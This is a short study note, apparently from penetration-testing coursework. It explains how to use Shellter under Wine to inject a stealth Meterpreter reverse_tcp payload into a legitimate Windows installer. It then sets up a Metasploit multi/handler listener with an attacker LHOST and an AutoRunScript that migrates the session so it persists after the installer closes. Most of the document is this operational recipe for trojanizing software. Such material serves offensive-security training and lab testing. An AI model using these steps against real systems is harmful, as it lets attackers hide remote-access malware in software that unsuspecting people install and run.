Using Shellter Tool

Using Shellter tool

  • apt install shellter to install

  • It is window tool , so use wine tool apt insatll wine wine shellter

  • Select A for automatic mode

  • Enter path of target window software (Download putty from https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html)

  • Enable stealth mode with Y

  • Type L for selecting listed payload and then index no. like 1

  • type LHOST and LPORT

  • Enable meterpreter listener

kali@kali:~$ msfconsole
msf > use exploit/multi/handler
msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 10.11.0.78
msf exploit(multi/handler) > show options
msf exploit(multi/handler) > set AutoRunScript post/windows/manage/migrate
msf exploit(multi/handler) > exploit
  • transfer the malicious software to the testing window client and run

<aside> 💡 Once we execute the file, we are presented with the default WinRAR installation window, which will install the software normally without any issues. Looking back at our handler shows that we successfully received a Meterpreter session but the session appears to die after the installation either finishes or is cancelled. This makes sense because the installer execution has completed and the process has been terminated. In order to overcome this problem, we can set up an AutoRunScript to migrate our Meterpreter to a separate process immediately after session creation.

</aside>

Last updated